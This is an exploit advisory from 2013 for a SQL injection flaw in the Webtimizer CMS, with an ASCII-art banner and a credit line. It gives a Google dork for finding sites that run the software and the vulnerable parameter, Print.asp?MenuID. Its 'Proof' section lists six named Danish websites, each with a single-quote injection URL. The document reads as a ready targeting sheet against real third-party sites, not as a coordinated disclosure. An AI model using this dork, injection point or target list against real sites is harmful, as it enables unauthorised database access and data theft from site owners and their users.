Sites powered by Webtimizer suffer from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
602eeae979d136de5207f086117102ea2c3246d1afee821f4fce57d238bca93e
________ __ __ __
/ | / | / | / |
$$$$$$$$/ __ __ ______ $$ | ______ $$/ _$$ |_
$$ |__ / \ / | / \ $$ | / \ / |/ $$ |
$$ | $$ \/$$/ /$$$$$$ |$$ |/$$$$$$ |$$ |$$$$$$/
$$$$$/ $$ $$< $$ | $$ |$$ |$$ | $$ |$$ | $$ | __
$$ |_____ /$$$$ \ $$ |__$$ |$$ |$$ \__$$ |$$ | $$ |/ |
$$ |/$$/ $$ |$$ $$/ $$ |$$ $$/ $$ | $$ $$/
$$$$$$$$/ $$/ $$/ $$$$$$$/ $$/ $$$$$$/ $$/ $$$$/
$$ |
$$ |
$$/
#********************************************************************************
# [+] Exploit Title : Webtimizer Sql injection vulnerability
#*********************************************************************
# [+] Software link : http://webtimiser.dk
#*****************************************************************
# [+] Exploit Author : Ashiyane Digital Security Team
#****************************************************
# [+] Tested on: Windows 7 , Linux
#*********************************
# [+] Google Dork : intext:"Powered by Webtimizer"
#***********************************************************
# [+] Date: 2013/09/01
#*********************
--------------------------------------------------------------------
# [+] Exploit :
#
# [+] Location : [Target]/Print.asp?MenuID=[Sql Injection]
#
#-------
# Proof:
#-------
#
# http://www.kunstkonservering.dk/Print.asp?MenuID=1'
#
# http://www.danacolor.dk/Print.asp?MenuID=1'
#
# http://www.d-e-b.dk/Print.asp?MenuID=1'
#
# http://www.ditcon.dk/Print.asp?MenuID=1'
#
# http://www.freserammer.dk/Print.asp?MenuID=1'
#
# http://www.handymanonline.dk/Print.asp?MenuID=1'
#
#
######################
discovered by : ACC3SS
######################